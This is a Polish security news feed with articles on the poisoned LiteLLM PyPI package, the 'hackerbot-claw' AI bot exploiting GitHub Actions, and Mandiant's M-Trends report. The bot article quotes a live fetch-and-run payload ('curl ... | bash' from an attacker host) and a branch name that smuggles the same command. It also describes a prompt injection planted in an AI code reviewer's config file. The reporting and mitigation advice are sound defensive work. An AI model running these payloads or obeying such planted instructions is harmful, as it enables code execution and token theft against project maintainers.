		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hack-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI pojawiła się złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań. Wystarczyło zainstalować. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/"><![CDATA[<p>Wczoraj, 24 marca, na oficjalnym repozytorium PyPI <a href="https://github.com/BerriAI/litellm/issues/24512" target="_blank">pojawiła się</a> złośliwa wersja szalenie popularnej biblioteki LiteLLM (wersje 1.82.7 oraz 1.82.8). Czym jest LiteLLM? To opensource&#8217;owa &#8220;bramka&#8221;, która ułatwia programistom łączenie się z wieloma modelami językowymi (LLM) za pomocą jednego interfejsu API. To nie jest niszowy projekt, paczka ma na liczniku ponad 97 milionów pobrań.<span id="more-26965"></span></p>
<p><H3>Wystarczyło zainstalować. Nie trzeba było nawet uruchamiać!</H3>Atakujący wykorzystali mechanizm ukrywania kodu w plikach z rozszerzeniem &#8220;<span class="code">.pth</span>&#8221; (tzw. Python Startup Hooks). Wrzucony przez nich do zatrutej paczki plik &#8220;<span class="code">litellm_init.pth</span>&#8221; był <strong>automatycznie wykonywany przy każdym uruchomieniu interpretera Pythona</strong>.</p>
<p>To oznacza, że programiści-ofiary nie musieli wcale pisać &#8220;<span class="code">import litellm</span>&#8221; w swoim kodzie. Wystarczyło, że zainstalowali paczkę (np. poprzez pobranie innego projektu, który używał LiteLLM jako zależności), a ukryty złośliwy skrypt uruchamiał się w tle przy każdym wywołaniu Pythona. Złośliwy kod wykradał z systemu: </p>
<ul>
<li>Klucze SSH, zmienne środowiskowe (a więc i klucze API), i pliki z konfiguracją Dockera.</li>
<li>Dane uwierzytelniające do chmur AWS, GCP, Azure oraz całe konfiguracje klastrów Kubernetes.</li>
<li>Klucze prywatne TLS, hasła do baz danych (PostgreSQL, MySQL, Redis) i pliki portfeli kryptowalutowych.</li>
<li>Historia powłoki (bash_history, zsh_history), gdzie często lądują hasła wpisywane &#8220;z palca&#8221;.</li>
</ul>
<p>Wszystkie te dane są pakowane do archiwum <span class="code">tpcp.tar.gz</span>, szyfrowane i wysyłane na serwer kontrolowany przez napastników: &#8220;<span class="code">models.litellm[.]cloud</span>&#8220;. Wiecie więc już czego szukać w logach&#8230; Szacuje się, że ofiarą tego ataku mogło paść nawet 500 000 urządzeń. Ale mogło być gorzej&#8230;</p>
<p><H3>Wpadka hakera zmniejszyła katastrofę</H3>Co ciekawe, atakujący popełnili głupi błąd. Jak <a href="https://www.google.com/search?q=https://www.bleepingcomputer.com/news/security/popular-litellm-pypi-package-backdoored-to-steal-credentials-auth-tokens/" target="_blank">informuje</a> Callum McMahon, wstrzyknięty kod zachował się u niego jak &#8220;fork bomba&#8221;. Złośliwy skrypt uruchamiał w tle kolejny proces Pythona, co powodowało, że ten nowy proces znowu czytał zatruty plik &#8220;.pth&#8221;, odpalając kolejnego Pythona i tak w nieskończoność. U niektórych programistów używających środowisk takich jak Cursor powodowało to natychmiastowe zużycie pamięci RAM do maksimum i zwieszkę kompa. Dzięki temu, że kod hakerów &#8220;wywalał&#8221; sprzęt, atak szybko zauważono, a <strong>paczkę usunięto z PyPI po niespełna 3 godzinach</strong>. Ale ponoć nie u wszystkich kod się zapętlał&#8230;</p>
<h3>Kto stoi za atakiem i jak tego dokonał?</h3>
<p>A teraz najlepsze. Za atak odpowiada grupa TeamPCP, która dostała się do infrastruktury LiteLLM poprzez wcześniejsze zhackowanie &#8230;<strong>skanera podatności Trivy</strong>, którego używano w procesie CI/CD (automatyzacji budowania i testowania kodu). </p>
<p>To klasyczny, wręcz podręcznikowy <strong>atak na łańcuch dostaw</strong> (ang. supply-chain attack) &#8212; co więcej o tym jak łatwo było wstrzyknąć coś w kod Trivy pisaliśmy w poprzednim artykule &#8212; <a href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/" target="_blank">zrobił to bot AI, wysyłając im Pull Requesta na GitHubie</a>&#8230;</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg" alt="" width="350" height="203" class="aligncenter size-medium wp-image-26968" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-350x203.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-600x348.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-768x446.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1-1536x892.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/liteLLM-hacked-1.jpg 1750w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><H3>Co robić, jak żyć?</H3>Jeśli używasz Pythona, to:</p>
<blockquote><p>natychmiast sprawdź, czy w Twoim systemie lub kontenerach nie zainstalowała się wersja 1.82.7 lub 1.82.8 pakietu LiteLLM (<span class="code">pip show litellm</span>). Szukaj też pliku &#8220;litellm_init.pth&#8221; w katalogach &#8220;site-packages&#8221; &#8212; a jak go tam znajdziesz, to usuń.</p></blockquote>
<p>Jeśli go znajdziesz &#8212; współczujemy. Musisz założyć, że WSZYSTKIE hasła, klucze API i tokeny, które znajdowały się na tej maszynie (w tym te w plikach .env), są w rękach włamywaczy. Należy je natychmiast ubić/zrotować.</p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg" alt="" width="208" height="250" class="aligncenter size-medium wp-image-22047" srcset="https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-208x250.jpg 208w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-500x600.jpg 500w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic-768x922.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2020/09/webinary-pic.jpg 1122w" sizes="auto, (max-width: 208px) 100vw, 208px" /></a><br />
Chcesz wiedzieć jak bezpiecznie tworzyć kod aplikacji (nie tylko webowych)? To zapraszamy Cię na 2 dniowe, silnie praktyczne, niebezpiecznikowe szkolenie dla programistów &#8220;Atakowanie i Ochrona Webaplikacji&#8221;. Pokazujemy na nim najpopularniejsze błędy, jakie widzimy na testowanych przez nasz zespół bezpieczeństwa aplikacjach i uczymy wszystkiego, na co trzeba zwrócić uwagę podczas projektowania, budowy, testowania i deployowania kodu na produkcję. Najbliższe terminy znajdziesz poniżej (podaj podczas rejestracji w uwagach kod LITELLM, to zapiszemy Cię ze zniżką):</p>
<div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>14-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 3 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1ifh8i6">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 1 maja)<br>
                        2744 PLN netto (od 2 maja)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 17 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>07-08 września 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idapyj">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 15 maja)<br>
                        2744 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Poznań</b>: <strong>14-15 grudnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idaqel">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 29 maja)<br>
                        2744 PLN netto (od 30 maja)
                        </ul></div></div>
<p>PS. Badamy zainteresowanie webinarem na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej &#8212; jak cykl wystartuje, wyślemy Ci powiadomienie:</p>
<blockquote><p>
<script src='https://www.google.com/recaptcha/api.js'></script></p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" style="margin-left:auto; margin-right:auto; width: 300px">
<label for="email" style="color:gray">Wpisz adres e-mail:</label><br />
<input type="email" name="email" id="email" size="35"/></p>
<p><label for="email" style="color:gray">Rozwiąż Captcha:</label></p>
<p class="g-recaptcha" data-sitekey="6LeoxuQUAAAAAA5HroywxIlzmrv1K2Ciq0BZKBZb">
<div style="display:none;">
<label for="hp">HP</label><input type="text" name="hp" id="hp"/></div>
<p><input type="hidden" name="list" value="T2Vqs9qFpXQZfhm7VWOOcQ"/><input type="hidden" name="subform" value="yes"/><input type="submit" name="submit" id="submit" value=" Poinformuj mnie o starcie! "/><br />
</form>
<p><small style="color:gray">Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij <a href="https://niebezpiecznik.pl/regulamin-sklep/#rodo">tutaj</a>.</small>
</p></blockquote>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/#comments" rel="replies" thr:count="8" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/feed/atom/" rel="replies" thr:count="8" type="application/atom+xml"/>
			<thr:total>8</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Bot AI przez tydzień hackował projekty na GitHubie. I zhackował]]></title>
		<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26953</id>
		<updated>2026-03-25T10:02:49Z</updated>
		<published>2026-03-25T09:46:17Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Claude"/><category scheme="https://niebezpiecznik.pl" term="Hackerbot-claw"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-github-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Sztuczna inteligencja nie tylko pisze kod. Zaczęła go również skutecznie atakować. Na przełomie lutego i marca autonomiczny bot o nazwie &#8220;hackerbot-claw&#8221; wziął sobie na celownik największe repozytoria na GitHubie. Oprogramowanie napędzane przez model Claude-Opus-4.5, samodzielnie skanowało publiczne projekty, wykrywało luki i skutecznie wyexploitowało (RCE) infrastruktury 4 firm, w tym Microsoftu. Jak wygląda hacking na autopilocie? [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/"><![CDATA[<p>Sztuczna inteligencja nie tylko pisze kod. Zaczęła go również skutecznie atakować. Na przełomie lutego i marca autonomiczny bot o nazwie &#8220;hackerbot-claw&#8221; wziął sobie na celownik największe repozytoria na GitHubie. Oprogramowanie napędzane przez model Claude-Opus-4.5, samodzielnie skanowało publiczne projekty, wykrywało luki i skutecznie wyexploitowało (RCE) infrastruktury 4 firm, w tym Microsoftu.<span id="more-26953"></span></p>
<h3>Jak wygląda hacking na autopilocie?</h3>
<p>Jak <a href="https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation)" target="_blank">opisują</a> sprawę badacze ze StepSecurity, hackerbot-claw na celownik wziął GitHub Actions &#8212; czyli popularne mechanizmy CI/CD (systemy automatyzacji budowania, testowania i wdrażania kodu) w tych projektach:</p>
<p><code>microsoft/ai-discovery-agent<br />
&#x200d;DataDog/datadog-iac-scanner<br />
&#x200d;avelino/awesome-go (140k+ stars)<br />
ambient-code/platform<br />
project-akri/akri (a CNCF project)<br />
aquasecurity/trivy (full repository compromise)<br />
RustPython/RustPython (20k+ stars)</code></p>
<p>Bot zawsze wstrzykiwał ten sam payload:</p>
<p><code>curl -sSfL hackmoltrepeat.com/molt | bash </code></p>
<p>Ale 5 różnymi wektorami ataku&#8230; Najciekawszym z nich był tzw. &#8220;<strong>Pwn Request</strong>&#8220;. Bot wykorzystał workflow typu &#8220;<span class="code">pull_request_target</span>&#8220;, które domyślnie posiada dostęp do sekretów docelowego repozytorium. Tworząc PR, bot wstrzykiwał złośliwy kod (np. do pliku konfiguracyjnego lub nawet w samą nazwę nowej gałęzi), a serwery budujące bezmyślnie go wykonały. W efekcie wykradał &#8220;<span class="code">GITHUB_TOKEN</span>&#8221; z uprawnieniami do zapisu.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-600x467.jpg" alt="" width="600" height="467" class="aligncenter size-large wp-image-26957" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-600x467.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-321x250.jpg 321w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-768x598.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw-1536x1196.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot-claw.jpg 1682w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Pozostałe techniki, to m.in. wstrzykiwanie złośliwego kodu do skryptów (np. dodanie funkcji &#8220;<a href="https://github.com/avelino/awesome-go/pull/6069" target="_blank">init()</a>&#8221; w języku Go), wstrzykiwanie poleceń powłoki (bash) poprzez specjalnie spreparowane nazwy gałęzi (<span class="code">dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)</span>) lub nazwy plików, zawierające zakodowane w Base64 komendy. </p>
<p>Najciekawszym atakiem był <strong>AI Prompt Injection</strong> &#8212; bot podmienił plik konfiguracyjny projektu, z którego korzystało narzędzie &#8220;Claude Code&#8221; (jako AI do code review), instruując swojego &#8220;bliźniaka&#8221;, by sam zatwierdziła złośliwy kod i przepchnął zmiany! Piękne, ale to się akurat nie udało, bo na szczęście, asystent zachował się wzorowo &#8212; zidentyfikował manipulację w swoim pliku konfiguracyjnym, odmówił wykonania złośliwych operacji i opublikował komentarz ostrzegający programistów: &#8220;Do Not Merge&#8221;.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-600x351.jpg" alt="" width="600" height="351" class="aligncenter size-large wp-image-26961" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-600x351.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-350x205.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-768x449.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1-1536x898.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1.jpg 1600w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-600x367.jpg" alt="" width="600" height="367" class="aligncenter size-large wp-image-26958" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-600x367.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-350x214.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-768x470.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-1536x940.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw.jpg 1600w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Przejęcie Trivy i kradzież tokenów</h3>
<p>Najpoważniejsze konsekwencje poniósł projekt Trivy (Aqua Security), który &#8212; jak na ironię &#8212; jest skanerem podatności. Bot z powodzeniem wykradł Personal Access Token o szerokich uprawnieniach i użył go, aby:</p>
<ul>
<li>Przekształcić repozytorium na prywatne i zmienić jego nazwę.</li>
<li>Skasować wszystkie wydania (GitHub Releases) z kilku lat.</li>
<li>Wypuścić podejrzany artefakt jako rozszerzenie Trivy w sklepie Open VSIX (czyli atak na programistów przez &#8220;łańcuch dostaw&#8221;).</li>
<li>Zostawić w pliku README.md ironiczną wiadomość.</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-350x209.jpg" alt="" width="350" height="209" class="aligncenter size-medium wp-image-26962" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-350x209.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-600x358.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-768x458.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2-1536x916.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/hackerbot_claw-2.jpg 1690w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Używam Github Actions, co robić, jak żyć?</h3>
<p>Jeśli zostawicie gdzieś niezabezpieczony workflow w GitHub Actions, prędzej czy później odwiedzi go &#8220;autonomiczny badacz&#8221; i zrobi Wam jesień średniowiecza w repozytorium. Dlatego</p>
<ul>
<li>Zawsze stosujcie zasadę najmniejszych uprawnień dla tokenów. GITHUB_TOKEN powinien mieć tylko uprawnienia do odczytu (contents: read), chyba że zapis jest absolutnie konieczny. </li>
<li>Nigdy nie używajcie akcji &#8220;actions/checkout&#8221; z niezaufanym kodem w połączeniu z &#8220;pull_request_target&#8221;.</li>
<li>Zablokujcie też nieautoryzowany ruch sieciowy z maszyn wirtualnych CI/CD (np. wychodzące żądania curl), co zapobiegnie pobraniu złośliwego payloadu lub wysłania w siną dal wykradzionego tokena.</li>
</ul>
<h3>AI atakuje AI, czyli nowa rzeczywistość</h3>
<p>Historia bota &#8220;hackerbot-claw&#8221; to dowód na to, że zmienia się krajobraz zagrożeń. Wkroczyliśmy w erę, w której agenty AI atakują inne agenty AI. Szczególnie ciekawy (i przerażający) jest tu atak za pomocą wstrzykiwania promptu (Prompt Injection) do pliku konfiguracyjnego.</p>
<p>Rozważamy cyk webinarów na temat szeroko rozumianego AI i bezpieczeństwa (zarówno od strony użytkownika jak i developera). Zainteresowany? To zostaw nam maila w polu poniżej &#8212; jak cykl wystartuje, wyślemy Ci powiadomienie:</p>
<blockquote><p>
<script src='https://www.google.com/recaptcha/api.js'></script></p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" style="margin-left:auto; margin-right:auto; width: 300px">
<label for="email" style="color:gray">Wpisz adres e-mail:</label><br />
<input type="email" name="email" id="email" size="35"/></p>
<p><label for="email" style="color:gray">Rozwiąż Captcha:</label></p>
<p class="g-recaptcha" data-sitekey="6LeoxuQUAAAAAA5HroywxIlzmrv1K2Ciq0BZKBZb">
<div style="display:none;">
<label for="hp">HP</label><input type="text" name="hp" id="hp"/></div>
<p><input type="hidden" name="list" value="T2Vqs9qFpXQZfhm7VWOOcQ"/><input type="hidden" name="subform" value="yes"/><input type="submit" name="submit" id="submit" value=" Poinformuj mnie o starcie! "/><br />
</form>
<p><small style="color:gray">Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij <a href="https://niebezpiecznik.pl/regulamin-sklep/#rodo">tutaj</a>.</small>
</p></blockquote>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/#comments" rel="replies" thr:count="6" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/bot-ai-przez-tydzien-hackowal-projekty-na-githubie-i-zhackowal/feed/atom/" rel="replies" thr:count="6" type="application/atom+xml"/>
			<thr:total>6</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[To nie AI jest największym zagrożeniem. Czyli raport opisujący incydenty z 2025 roku]]></title>
		<link href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26947</id>
		<updated>2026-03-24T16:19:05Z</updated>
		<published>2026-03-24T16:15:49Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Mandiant"/><category scheme="https://niebezpiecznik.pl" term="raporty"/><category scheme="https://niebezpiecznik.pl" term="sieci"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Mandiant opublikował swój coroczny raport M-Trends. Raport, wbrew oczekiwaniom niektórych, nie stoi pod znakiem &#8220;AI niszczy świat&#8221;. Wnioski są dużo bardziej prozaiczne, a jednocześnie przerażające. AI faktycznie pomaga atakującym (głównie w socjotechnice i pisaniu malware&#8217;u omijającego detekcję), ale przytłaczająca większość udanych włamań to wciąż wynik błędów ludzkich i systemowych. Oto najciekawsze smaczki, które warto znać [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/"><![CDATA[<p>Mandiant opublikował swój coroczny <a href="https://www.gstatic.com/security-marketing/m-trends-2026-en.pdf" target="_blank">raport</a> M-Trends. Raport, wbrew oczekiwaniom niektórych, nie stoi pod znakiem &#8220;AI niszczy świat&#8221;. Wnioski są dużo bardziej prozaiczne, a jednocześnie przerażające. AI faktycznie pomaga atakującym (głównie w socjotechnice i pisaniu malware&#8217;u omijającego detekcję), ale przytłaczająca większość udanych włamań to wciąż wynik błędów ludzkich i systemowych.<span id="more-26947"></span></p>
<p>Oto najciekawsze smaczki, które warto znać z perspektywy Blue Teamów, Red Teamów i zwykłych adminów (rymy przypadkowe):</p>
<h3>Phishing e-mailowy wypierany przez vishing, czyli ataki socjotechniczne przez telefon</h3>
<p>To jedna z największych zmian w statystykach. Od sześciu lat wektorem nr 1 pozostaje wykorzystanie exploitów (32%). W 2025r. najczęściej dziurawiono SAP NetWeaver, Oracle E-Business Suite oraz Microsoft SharePoint. Ale uwaga: wektorem nr 2 nie jest już klasyczny phishing e-mailowy (spadek z 14% na zaledwie 6%). Na jego miejsce z wynikiem 11% wskoczył vishing oraz socjotechnika przez komunikatory. Kopsniesz mi 200 ziko blikiem, oddam jutro.</p>
<p>Na trzecim miejscu (10%) jest atak na łańcuch dostaw lub oprogramowanie firm trzecich (w tym SaaS).</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-600x359.jpg" alt="" width="600" height="359" class="aligncenter size-large wp-image-26951" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-600x359.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-350x210.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku-768x460.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/wektory-ataku.jpg 1152w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Szyfrowanie startuje po 30 sekundach od ataku</h3>
<p>Cyberjełopy się wyspecjalizowały. Grupy zajmujące się uzyskiwaniem początkowego dostępu (Initial Access Brokers) masowo infekują ofiary za pomocą np. złośliwych reklam (malvertising) lub fałszywych komunikatów w przeglądarce &#8212; popularny motyw <a href="https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/" target="_blank">ClickFix/InstallFix</a>, który jako chyba pierwsi zauważyliśmy i opisaliśmy we wrześniu 2024. Chodzi o wyskakujące okienko namawiające do wklejenia np. kodu do konsoli PowerShell.</p>
<p>Kiedyś IAB wystawiał uzyskane dostępy na grupach lub forach i czekał na kupca (np. operatora ransomware). W 2022r. mediana czasu od infekcji do przekazania dostępu wynosiła 8 godzin. W 2025 roku ten czas spadł do&#8230; 22 sekund. Tak, proces został zautomatyzowany. Malware (np. FAKEUPDATES) od razu pobiera i instaluje backdoora docelowej grupy (np. RansomHub). Z punktu widzenia SOC-u oznacza to, że alert o &#8220;nisko-priorytetowym&#8221; malware z przeglądarki musi być traktowany jako krytyczny incydent P1, bo już po kilku minutach napastnik zacząć może lateral movement.</p>
<p>Tu ciekawostka: Grupy APT wbijają się na brzegowe urządzenia sieciowe (wykorzystując 0-daye lub luki n-day), zakładają na nich własne konta, uruchamiają SSH na niestandardowych portach i puszczają sniffery pakietów, aby wyłapywać hasła latające po sieci w cleartext&#8217;cie.</p>
<h3>Ransomware to już nie tylko szyfrowanie. To &#8220;Recovery Denial&#8221;</h3>
<p>Złote czasy, gdy ransomware tylko szyfrował pliki, a ofiara po prostu odtwarzała je z backupu, minęły bezpowrotnie &#8212; o tym też na Niebezpieczniku <a href="https://niebezpiecznik.pl/post/co-robic-po-wycieku-danych/" target="_blank">mogliście usłyszeć wielokrotnie</a>. Głównym celem grup RaaS (Ransomware-as-a-Service) stała się teraz infrastruktura backupowa. Napastnicy wiedzą, że jeśli zniszczą kopie zapasowe to ofiara będzie bardziej skora do zapłaty. Kradną poświadczenia do serwerów backupu, hasła do macierzy NAS czy chmurowych bucketów i trwale kasują kopie zapasowe albo szyfrują to, co zostało. Pozyskują też całą bazę ntds.dit z kontrolerów domeny (często robiąc snapshoty maszyn wirtualnych z poziomu hypervisora, omijając w ten sposób EDR-y na hostach), korzystajż z GPO lub Microsoft Endpoint Manager aby pchnąć ransomware od razu, jednocześnie na tysiące stacji roboczych. Czasem, EDR może to zablokować, więc atakujący jeśli mogą, to szyfrują pliki .vmdk bezpośrednio na datastorze hypervisora.</p>
<p>Zarówno zaawansowane grupy szpiegowskie (np. z Chin, jak UNC5807 czy UNC5221), jak i cyberprzestępcy często celują w urządzenia, na których nie da się zainstalować agenta EDR. Chodzi np. o firewalle, routery, VPN oraz hypervisory (VMware ESXi, vCenter). Hypervisor wykorzystują jako kryjówkę. Zamiast atakować wirtualki, napastnik przejmuje HV i stawia na nim własną, &#8220;niewidzialną&#8221; (zarządzaną przez emulator QEMU) maszynę wirtualną. Nie widać jej w konsoli vCenter, nie skanują jej firmowe antywirusy, a służy ona do tunelowania ruchu z C2.</p>
<h3>OAuth &gt; Hasła</h3>
